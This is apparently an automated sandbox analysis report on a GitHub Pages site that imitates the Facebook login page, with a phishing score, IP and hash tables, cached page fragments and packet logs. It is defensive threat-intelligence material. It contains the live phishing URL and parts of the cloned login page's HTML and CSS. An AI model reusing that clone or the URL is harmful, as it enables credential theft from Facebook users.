75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.132	www.google.com	United States	15169	GOOGLEUS	false
185.199.109.153	omar-tnzxoo.github.io	Netherlands	54113	FASTLYUS	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
185.199.110.153	unknown	Netherlands	54113	FASTLYUS	false
142.250.74.196	unknown	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.4
192.168.2.5

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1521936
Start date and time:	2024-09-29 06:05:38 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://omar-tnzxoo.github.io/facebook-mobile/index.html
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.phis.win@27/20@8/7
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.131, 142.250.186.110, 64.233.184.84, 34.104.35.123, 142.250.186.42, 142.250.185.227, 172.217.18.106, 142.250.185.202, 172.217.16.138, 142.250.185.170, 142.250.185.74, 142.250.184.234, 142.250.185.138, 142.250.184.202, 142.250.186.170, 142.250.186.138, 142.250.185.106, 142.250.181.234, 142.250.185.234, 216.58.206.42, 172.217.23.106, 199.232.210.172, 192.229.221.95, 13.85.23.206, 20.3.187.198
Excluded domains from analysis (whitelisted): fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, fonts.gstatic.com, ctldl.windowsupdate.com.delivery.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, update.googleapis.com, clients.l.google.com, wu-b-net.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: https://omar-tnzxoo.github.io/facebook-mobile/index.html

Input	Output
URL: https://omar-tnzxoo.github.io/facebook-mobile/index.html Model: jbxai	{ "brand":["facebook"], "contains_trigger_text":false, "trigger_text":"", "prominent_button_name":"Login", "text_input_field_labels":["Email or phone number", "Password"], "pdf_icon_visible":false, "has_visible_captcha":false, "has_urgent_text":false, "has_visible_qrcode":false}

URL: https://omar-tnzxoo.github.io/facebook-mobile/index.html Model: jbxai	{ "phishing_score":9, "brands":"facebook", "legit_domain":"facebook.com", "classification":"wellknown", "reasons":["The brand 'Facebook' is well-known and has a widely recognized legitimate domain 'facebook.com'.", "The provided URL 'omar-tnzxoo.github.io' does not match the legitimate domain name for Facebook.", "The URL 'omar-tnzxoo.github.io' is hosted on GitHub Pages, which is a common platform for hosting personal or project pages, not official brand pages.", "The use of GitHub Pages for a brand like Facebook is highly unusual and suspicious.", "The input fields 'Email or phone number' and 'Password' are typical for login forms, which are commonly targeted in phishing attacks."], "brand_matches":[false], "url_match":false, "brand_input":"facebook", "input_fields":"Email or phone number, Password"}

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1558
Entropy (8bit):	5.11458514637545
Encrypted:	false
SSDEEP:	48:OBOCrYJ4rYJVwUCLHDy43HV713XEyMmZ3teTHn:LCrYJ4rYJVwUCHZ3Z13XtdUTH
MD5:	EE002CB9E51BB8DFA89640A406A1090A
SHA1:	49EE3AD535947D8821FFDEB67FFC9BC37D1EBBB2
SHA-256:	3DBD2C90050B652D63656481C3E5871C52261575292DB77D4EA63419F187A55B
SHA-512:	D1FDCC436B8CA8C68D4DC7077F84F803A535BF2CE31D9EB5D0C466B62D6567B2C59974995060403ED757E92245DB07E70C6BDDBF1C3519FED300CC5B9BF9177C
Malicious:	false
Reputation:	low
Preview:	// Copyright 2015 The Chromium Authors. All rights reserved..//.// Redistribution and use in source and binary forms, with or without.// modification, are permitted provided that the following conditions are.// met:.//.// * Redistributions of source code must retain the above copyright.// notice, this list of conditions and the following disclaimer..// * Redistributions in binary form must reproduce the above.// copyright notice, this list of conditions and the following disclaimer.// in the documentation and/or other materials provided with the.// distribution..// * Neither the name of Google Inc. nor the names of its.// contributors may be used to endorse or promote products derived from.// this software without specific prior written permission..//.// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS.// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.// A PARTICULAR

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5964_828522034\_metadata\verified_contents.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1864
Entropy (8bit):	6.021127689065198
Encrypted:	false
SSDEEP:	48:p/hUI1atAdI567akUmYWEFw/3+ovGJ4F3jkZUbvzk98g5m7:RnYQI47avYUwvVGJ41jkZIzxgA7
MD5:	68E6B5733E04AB7BF19699A84D8ABBC2
SHA1:	1C11F06CA1AD3ED8116D356AB9164FD1D52B5CF0
SHA-256:	F095F969D6711F53F97747371C83D5D634EAEF21C54CB1A6A1CC5B816D633709
SHA-512:	9DC5D824A55C969820D5D1FBB0CA7773361F044AE0C255E7C48D994E16CE169FCEAC3DE180A3A544EBEF32337EA535683115584D592370E5FE7D85C68B86C891
Malicious:	false
Reputation:	low
Preview:	[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJMSUNFTlNFIiwicm9vdF9oYXNoIjoiUGIwc2tBVUxaUzFqWldTQnctV0hIRkltRlhVcExiZDlUcVkwR2ZHSHBWcyJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiIyNXB3SWdtQWU2QTVoeDVVTG9OV0laODBLbzJjbktOTHpacUdjbjlLT2c4In0seyJwYXRoIjoic2V0cy5qc29uIiwicm9vdF9oYXNoIjoiOWVza0FuRlBsM3VCQzkwUmFWakxNaVI3NXZIQi0wQUVmMmg0RzU3ZXNpcyJ9XSwiZm9ybWF0IjoidHJlZWhhc2giLCJoYXNoX2Jsb2NrX3NpemUiOjQwOTZ9XSwiaXRlbV9pZCI6ImdvbnBlbWRna2pjZWNkZ2JuYWFiaXBwcGJtZ2ZnZ2JlIiwiaXRlbV92ZXJzaW9uIjoiMjAyNC44LjEwLjAiLCJwcm90b2NvbF92ZXJzaW9uIjoxfQ","signatures":[{"header":{"kid":"publisher"},"protected":"eyJhbGciOiJSUzI1NiJ9","signature":"dU2MmRUQSugaJAJvEN4uaQHx-KXdOkjj0yK8_aH4Afr3kN7DPOZRt6yLTS3UchBE5M-dgPPPBuKADj4KEK4B22SO6WQquL5J27AUPqQBGgr44-iFGVJdOLLlfirFlJmcYv6DUFRYiPsQFGMr1JFqInj19jgkOxzR6qqcNuTCB0wGEMeTU80r-igCjeQG6TIzPro7yKd_-UxsxO6OGAySmlIJIoU54X0p0ATNoZyAfkhb8kb0oN8unOU

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5964_828522034\manifest.fingerprint

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	66
Entropy (8bit):	3.9159446964030753
Encrypted:	false
SSDEEP:	3:Sq5TQRaELVHecsUDBAeHD5k:Sq5gJ+csHej5k
MD5:	CFB54589424206D0AE6437B5673F498D
SHA1:	D1EF6314F0F68EFDD0BA8F6CA9E59BFF863B1609
SHA-256:	285AC183C35350B4B77332172413902F83726CA8F53D63859B5DA082FD425A1C
SHA-512:	70FDCA4A1E6B7A5FFED3414E2DB74FECA7E0FD17482B8CB30393DFEE20AB9AD2B0B00FF0C590DD0E8D744D0EAD876CE8844519AF66618ED14666BCA56DF2DA21
Malicious:	false
Reputation:	low
Preview:	1.dbf288588465463a914bdfc5e86d465fb3592b2f1261dc0e40fcc5c1adc8e7e4

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5964_828522034\manifest.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	85
Entropy (8bit):	4.4533115571544695
Encrypted:	false
SSDEEP:	3:rR6TAulhFphifFCmMARWHJqS1tean:F6VlM8aRWpqS1ln
MD5:	C3419069A1C30140B77045ABA38F12CF
SHA1:	11920F0C1E55CADC7D2893D1EEBB268B3459762A
SHA-256:	DB9A702209807BA039871E542E8356219F342A8D9C9CA34BCD9A86727F4A3A0F
SHA-512:	C5E95A4E9F5919CB14F4127539C4353A55C5F68062BF6F95E1843B6690CEBED3C93170BADB2412B7FB9F109A620385B0AE74783227D6813F26FF8C29074758A1
Malicious:	false
Reputation:	low
Preview:	{. "manifest_version": 2,. "name": "First Party Sets",. "version": "2024.8.10.0".}

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5964_828522034\sets.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	9748
Entropy (8bit):	4.629326694042306
Encrypted:	false
SSDEEP:	96:Mon4mvC4qX19s1blbw/BNKLcxbdmf56MFJtRTGXvcxN43uP+8qJq:v5C4ql7BkIVmtRTGXvcxBsq
MD5:	EEA4913A6625BEB838B3E4E79999B627
SHA1:	1B4966850F1B117041407413B70BFA925FD83703
SHA-256:	20EF4DE871ECE3C5F14867C4AE8465999C7A2CC1633525E752320E61F78A373C
SHA-512:	31B1429A5FACD6787F6BB45216A4AB1C724C79438C18EBFA8C19CED83149C17783FD492A03197110A75AAF38486A9F58828CA30B58D41E0FE89DFE8BDFC8A004
Malicious:	false
Reputation:	low
Preview:	{"primary":"https://bild.de","associatedSites":["https://welt.de","https://autobild.de","https://computerbild.de","https://wieistmeineip.de"],"serviceSites":["https://www.asadcdn.com"]}.{"primary":"https://blackrock.com","associatedSites":["https://blackrockadvisorelite.it","https://cachematrix.com","https://efront.com","https://etfacademy.it","https://ishares.com"]}.{"primary":"https://cafemedia.com","associatedSites":["https://cardsayings.net","https://nourishingpursuits.com"]}.{"primary":"https://caracoltv.com","associatedSites":["https://noticiascaracol.com","https://bluradio.com","https://shock.co","https://bumbox.com","https://hjck.com"]}.{"primary":"https://carcostadvisor.com","ccTLDs":{"https://carcostadvisor.com":["https://carcostadvisor.be","https://carcostadvisor.fr"]}}.{"primary":"https://citybibleforum.org","associatedSites":["https://thirdspace.org.au"]}.{"primary":"https://cognitiveai.ru","associatedSites":["https://cognitive-ai.ru"]}.{"primary":"https://drimer.io","asso

Chrome Cache Entry: 113

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 18596, version 1.0
Category:	downloaded
Size (bytes):	18596
Entropy (8bit):	7.988788312296589
Encrypted:	false
SSDEEP:	384:h5D5WUhNanar/Z19V6iGCYIqoPfHwfr13GPgqbrxremyFKKWB:h/NaOrBGCYIBPfQD1xqPhl
MD5:	C83E4437A53D7F849F9D32DF3D6B68F3
SHA1:	FABEA5AD92ED3E2431659B02E7624DF30D0C6BBC
SHA-256:	D9BADA3A44BB2FFA66DEC5CC781CAFC9EF17ED876CD9B0C5F7EF18228B63CEBB
SHA-512:	C2CA1630F7229DD2DEC37E0722F769DD94FD115EEFA8EEBA40F9BB09E4FDAB7CC7D15F3DEEA23F50911FEAE22BAE96341A5BACA20B59C7982CAF7A91A51E152F
Malicious:	false
Reputation:	low
URL:	https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmWUlfBBc4.woff2
Preview:	wOF2......H...........H=................................\|.`..J.H..<........>..Z...x.6.$..0. ..~. ..)...%.m..t.D<...U.c....D....@........@e..a..R./<...p..q..q....S<.nm...X..(ER....e.....O.?Q_..FYH......ml.E..?;X0>.f.Y.,.n.a...._h8c.006U.cS..3.m.Or..I9..5.;.=..'!..c.O...W.K..f....k..&Xq..Y?.r...%.S..y.:q.......uD.d.R..'..Q,L.... e`..=?.{...e%{.....3+$.....NkF2...... ._}..2]....,.F.u.S4O.~w).G..../]}6.nVwKj.h@........5.7P....i..r........U?.........q..Cm......g...\.zu.....P..\|....5G$...4k$..L..g..".y..?..6...O...e..@..0TYh..v........M.....#B...O.i.G$.Bq..m.A.s~...A...c.....25K.....B..<..w.A....G.O...A......A,y"q....q<....N..{Ta..!.\|vzo.;9.5>.>....7I.i.Ld.4..y...].g.....'m_(...O-..}.K.(....R..2.q.z9.D..]..$.#$.:x..:{..m.OF...K[J. ......lpH.#%V....4.;l.<..J.6.T..a...I..\|..zj.k.-...y...#..e.1,s....<.HX.....z{L....'.$. "..tY..m.<.\8P. a.......x.W\.b.%...RA.\.... M.......v1......#...............`.c..%.Nc.d.qP.68....$<.O.S_7...U.].jn>@.3.c..wO..>.>a.qg....\..kb.

Chrome Cache Entry: 114

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	28
Entropy (8bit):	4.2359263506290326
Encrypted:	false
SSDEEP:	3:QQinPt:+Pt
MD5:	1505E9BB79B4C3F51AEC072BFF0E4F1D
SHA1:	C2229235760065DD7708E3D63A718B05FF209F37
SHA-256:	C3E80C02DBB99150A42F8867CFC2BD1565E9B7DE84EB4F3D75C9AF0A674566D1
SHA-512:	C0B996819ED4D93E5D5158867080BC16B479FD2EE651FD4F56453ABCEF6F5B5C67BB6E313D29971A61BE963BE67F4483939B89DDBB711B647453F7A0B966D47C
Malicious:	false
Reputation:	low
URL:	https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwnB0oNNC70VJBIFDXhvEhkSBQ3OQUx6?alt=proto
Preview:	ChIKBw14bxIZGgAKBw3OQUx6GgA=

Chrome Cache Entry: 115

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	Web Open Font Format (Version 2), TrueType, length 18536, version 1.0
Category:	downloaded
Size (bytes):	18536
Entropy (8bit):	7.986571198050597
Encrypted:	false
SSDEEP:	384:IhocXmE6eM871P7td/mcOKA454H2orQEONKrOqxw:f6WeL1P//9D54WCCKc
MD5:	8EFF0B8045FD1959E117F85654AE7770
SHA1:	227FEE13CEB7C410B5C0BB8000258B6643CB6255
SHA-256:	89978E658E840B927DDDB5CB3A835C7D8526ECE79933BD9F3096B301FE1A8571
SHA-512:	2E4FB65CAAB06F02E341E9BA4FB217D682338881DABA3518A0DF8DF724E0496E1AF613DB8E2F65B42B9E82703BA58916B5F5ABB68C807C78A88577030A6C2058
Malicious:	false
Reputation:	low
URL:	https://fonts.gstatic.com/s/roboto/v32/KFOmCnqEu92Fr1Mu4mxK.woff2
Preview:	wOF2......Hh..........H..............................Z..\|.`..J.T..<.....H..U..Z...x.6.$..0. ..t. ..I....p.0.VU.......1....AQ...d..x.....R..4.-.c..C$fUc.c..IX..@..~g.xs.....%...O...eJ.w..U.\|.......%..{.......U+..T#.S......`.n.....V.w.4..~P"..zk.%..../........=3...F.........V.FL..;Bc.........A.Uk.U1.b!Y.BH.DL...s.s...F.m.9a..GJ..1..#.`m5..DI..X5#.........B.Akm.....&..0...{.L.....G......-(.......O4.@3....=......f..l...$.....j..NO...e.Y.tJ2J>F.(.c....08..e...~....D2S7s:.G'Gm........!.7.........r.c.`,.....~.).......c>1.......Y.g2^...T-1.7./r./....>...g.ov@u.?.U.+._...'M..,.,g....!g..9."..yBF.#r+.Ps...%.d=....U...5.b.$:`.4R.II.<A....Q)....e...k.....M.8.z....+.....5}..F........F.d._...].~-](.Lf....Y..W....;-z...;. .@x._v../.%UIm....=s...P.C....G...^..Q.!g.!b._.P....at..?.}....t.z...O(..Y6..R.2.X....k.R..K.gw(.F.K?m..R...7....dj..7. .r.U..be.4......8.].w.B..B......Y..:..8.N..U...NEm...\.^q..f}.......{..6.". ...y-.Y...N.+.M E..`......R.$T

Chrome Cache Entry: 116

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	downloaded
Size (bytes):	8987
Entropy (8bit):	5.053765659962307
Encrypted:	false
SSDEEP:	96:s6dON/KXFNbVD1TMzPXH6mCQ23Tm7C32pQBocOx6vfib9t2gSrN94+w22+w3o9Ct:PONGFNDMz/66e2seylo6vaObX5SPgm
MD5:	CAC8DD68B63C2BCDBD14960A1B1A3E7B
SHA1:	1130C09181117CC4A07D7A3C7B85F5A99DB3E1C3
SHA-256:	F0F190ECE4EE12C99572EBCA1973C6DA8F79CE0992480FC2513800C4018C3180
SHA-512:	9A4215EDF00772730D487312F271130AD16760908BA2DF0A15A05110C95AEE54AD3F29CE995AD1A8A451329FB4B6045FC690FE0254633F77F51AAF2C3D34CDED
Malicious:	false
Reputation:	low
URL:	https://omar-tnzxoo.github.io/facebook-mobile/index.html
Preview:	<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Facebook Login</title>.. <link rel="icon" href="assets/icon.png" type="image/png">.. <link rel="stylesheet" href="style.css">.. </head>.. <body>.. <div class="container flex">.. <div class="facebook-page flex">.. <div class="text">.. <h1>facebook</h1>.. <p>Connect with friends and the world </p>.. <p> around you on Facebook.</p>.. </div>.. <form id="loginForm" action="#">.. <input type="text" id="email" placeholder="Email or phone number" required>.. <input type="password" id="password" placeholder="Password" required>.. <div class="link">.. <button type="submit" class="login">Login</button>.. <a href="#" class="forgot">Forgot password?</a>.. </div>.. <hr>.. <div class="button">..

Chrome Cache Entry: 117

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	2527
Entropy (8bit):	4.958756368330792
Encrypted:	false
SSDEEP:	48:2oUQMhw7R+GdJcFL6E/vAO8fvjOc5VNt1CI17v:x+YrnE/IOuvj15P7v
MD5:	8E369B7367502192559BA131F6F987C7
SHA1:	796D712D6695AF62629D864735BBB0E6C5939159
SHA-256:	A75B0487FBC099F17036F1D584CD7B43505A18FA1F9C1952D30F2FBE299900B5
SHA-512:	C02A61126FF56FD2BDE34E335CD251B4833D887327053358A99669863364A7D20077FDC84DED71FC963362C283931B5DF28CE86134872984265002839B71CAB2
Malicious:	false
Reputation:	low
URL:	https://omar-tnzxoo.github.io/facebook-mobile/style.css
Preview:	@import url('https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;700&display=swap');....* {.. margin: 0;.. padding: 0;.. box-sizing: border-box;.. font-family: 'Roboto', sans-serif;..}.....flex {.. display: flex;.. align-items: center;..}.....container {.. padding: 0 15px;.. min-height: 100vh;.. justify-content: center;.. background: #f0f2f5;..}.....facebook-page {.. justify-content: space-between;.. max-width: 1000px;.. width: 100%;..}.....facebook-page .text {.. margin-bottom: 90px;..}.....facebook-page h1 {.. color: #1877f2;.. font-size: 4rem;.. margin-bottom: 10px;..}.....facebook-page p {.. font-size: 1.75rem;.. white-space: nowrap;..}....form {.. display: flex;.. flex-direction: column;.. background: #fff;.. border-radius: 8px;.. padding: 20px;.. box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1),.. 0 8px 16px rgba(0, 0, 0, 0.1);.. max-width: 400px;.. width: 100%;..}....form input {.. height: 55px;.. width: 100%;.. border: 1px solid #ccc;.. bo

Chrome Cache Entry: 118

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 553 x 556, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	16067
Entropy (8bit):	7.88608494847754
Encrypted:	false
SSDEEP:	384:+qDRe4waYJBhM9GS8zABAYxb9wj9SuOP7G80TY:+q9Z0YsYZ9G0K8SY
MD5:	E01A389BC1E00022C67803268A2B243D
SHA1:	64739061001B716354E95147CBEC859B9A0835E6
SHA-256:	7F89E1FDC42AEF30BDE4328F1DD3A8C0816FB717B1472D7E987A55EE0F2DD8EF
SHA-512:	8138227EBBB9024B08F6E0CF307C7A656C1E5B458F0FFE1BEF2F6DD4F577DF82B1CF4D1971B11D911B3EB4884A2BF75257CC237F7225A124B9493B86CB70B1D6
Malicious:	false
Reputation:	low
URL:	https://omar-tnzxoo.github.io/facebook-mobile/assets/icon.png
Preview:	.PNG........IHDR...)...,.....7^9.....sRGB.........gAMA......a.....pHYs...%...%.IR$...>XIDATx^...xT.....,$!!....!...-..)........R..Z[..Vk.K....Z....V.V....w.E.-.&.H !.H.....35b 3.sf...<O..A.{.....9......`7G.....l.....l.....l.....l.....l.....l.....l.....l.....l.....l........O..Cj.....n..$u.......zjM.t._b..HF].$..%i.OR...{...3....W$.J..(.....I...9Av.&.......[}..&[..>)^\|..MU.11.......!.p.@..M..[....i..[...j. ..n..P.....,U....E..wW)....0...!.p..]..k...V!dc.._}V..J.c...m.W%........0..Af`.Y.7S6.Nm,M........EH.lJ..._..&..6dm.."..#/]/V.e@wmma/..o.l,.[..)...%.l...D.*.l.....6.U......7k.j.J..K.!..rtoY~t..\|X.\|.......... .Z..%_...JF\|Y..ur.......fHOm.>...<YNp."...XH.l.o....K}.G_.q.i....S7.C{.g..h...+.v...R.`>B.`...C>.K..nI.. ....r..q?..?K.O.....}4&....i.;.o.h'B...@(y{.~./eLE..P...e.@m..=.s........e.f.Z9..J.C(A[Th9...8e.....YP...1h.m..........O_.E.JO..zZ....N...-}j.P..ZGH...&p>......g..N&.W.+q....!..S...:.........&..IW.[@D...W.u.............R

Chrome Cache Entry: 119

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	9348
Entropy (8bit):	5.397557097205847
Encrypted:	false
SSDEEP:	192:rNYbN8NjNY3YNON+FNkNP6NfNANk3FNNN8YNY5NmpNgNjNS3mNuN8fN/NFXNVNeJ:RYhKZ22EUiPA1uCrDDWmvOZAMkEVFdbC
MD5:	EE2BF22AE42441ABEA10F96DB055CAB2
SHA1:	5DCCD5656A0EC756F5E8F0517019820CD6CE7E70
SHA-256:	6F6C7E21A033BA788D3C4AB39FD8A313607ECC2E60118E127970E47D45A97228
SHA-512:	54E55DBC56A32FDB45B0062B33F4E65BAFEC6535977858B4490F70963B7B1005B36A66CD82E0C63C35C8588313FE879BD55FAF2806FEDE0560C96240702524E3
Malicious:	false
Reputation:	low
URL:	https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;700&display=swap
Preview:	/* cyrillic-ext /.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmSU5fCRc4EsA.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./ cyrillic /.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmSU5fABc4EsA.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./ greek-ext /.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmSU5fCBc4EsA.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./ greek */.@font-face {. font-family: 'Roboto';. font-style: normal;. font-weight: 300;. font-display: swap;. src: url(https://fonts.g

Chrome Cache Entry: 120

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 553 x 556, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	16067
Entropy (8bit):	7.88608494847754
Encrypted:	false
SSDEEP:	384:+qDRe4waYJBhM9GS8zABAYxb9wj9SuOP7G80TY:+q9Z0YsYZ9G0K8SY
MD5:	E01A389BC1E00022C67803268A2B243D
SHA1:	64739061001B716354E95147CBEC859B9A0835E6
SHA-256:	7F89E1FDC42AEF30BDE4328F1DD3A8C0816FB717B1472D7E987A55EE0F2DD8EF
SHA-512:	8138227EBBB9024B08F6E0CF307C7A656C1E5B458F0FFE1BEF2F6DD4F577DF82B1CF4D1971B11D911B3EB4884A2BF75257CC237F7225A124B9493B86CB70B1D6
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR...)...,.....7^9.....sRGB.........gAMA......a.....pHYs...%...%.IR$...>XIDATx^...xT.....,$!!....!...-..)........R..Z[..Vk.K....Z....V.V....w.E.-.&.H !.H.....35b 3.sf...<O..A.{.....9......`7G.....l.....l.....l.....l.....l.....l.....l.....l.....l.....l........O..Cj.....n..$u.......zjM.t._b..HF].$..%i.OR...{...3....W$.J..(.....I...9Av.&.......[}..&[..>)^\|..MU.11.......!.p.@..M..[....i..[...j. ..n..P.....,U....E..wW)....0...!.p..]..k...V!dc.._}V..J.c...m.W%........0..Af`.Y.7S6.Nm,M........EH.lJ..._..&..6dm.."..#/]/V.e@wmma/..o.l,.[..)...%.l...D.*.l.....6.U......7k.j.J..K.!..rtoY~t..\|X.\|.......... .Z..%_...JF\|Y..ur.......fHOm.>...<YNp."...XH.l.o....K}.G_.q.i....S7.C{.g..h...+.v...R.`>B.`...C>.K..nI.. ....r..q?..?K.O.....}4&....i.;.o.h'B...@(y{.~./eLE..P...e.@m..=.s........e.f.Z9..J.C(A[Th9...8e.....YP...1h.m..........O_.E.JO..zZ....N...-}j.P..ZGH...&p>......g..N&.W.+q....!..S...:.........&..IW.[@D...W.u.............R

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 29, 2024 06:06:24.462441921 CEST	49675	443	192.168.2.4	173.222.162.32
Sep 29, 2024 06:06:34.071765900 CEST	49675	443	192.168.2.4	173.222.162.32
Sep 29, 2024 06:06:35.997064114 CEST	49735	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:35.997144938 CEST	443	49735	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:35.997210979 CEST	49735	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:35.997570038 CEST	49735	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:35.997592926 CEST	443	49735	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:35.998475075 CEST	49736	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:35.998538971 CEST	443	49736	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:35.998802900 CEST	49736	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:35.998997927 CEST	49736	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:35.999026060 CEST	443	49736	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:36.467693090 CEST	443	49736	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:36.471041918 CEST	443	49735	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:36.515178919 CEST	49735	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:36.515185118 CEST	49736	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:36.582796097 CEST	49735	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:36.582829952 CEST	443	49735	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:36.582952023 CEST	49736	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:36.582971096 CEST	443	49736	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:36.586805105 CEST	443	49735	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:36.586855888 CEST	443	49736	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:36.586895943 CEST	49735	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:36.586950064 CEST	49736	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:36.589704037 CEST	49735	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:36.589915991 CEST	443	49735	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:36.590780020 CEST	49736	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:36.590873957 CEST	49735	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:36.590884924 CEST	443	49735	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:36.590991974 CEST	443	49736	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:36.635231018 CEST	49735	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:36.635232925 CEST	49736	443	192.168.2.4	185.199.109.153
Sep 29, 2024 06:06:36.635263920 CEST	443	49736	185.199.109.153	192.168.2.4
Sep 29, 2024 06:06:36.682308912 CEST	49736	443	192.168.2.4	185.199.109.153
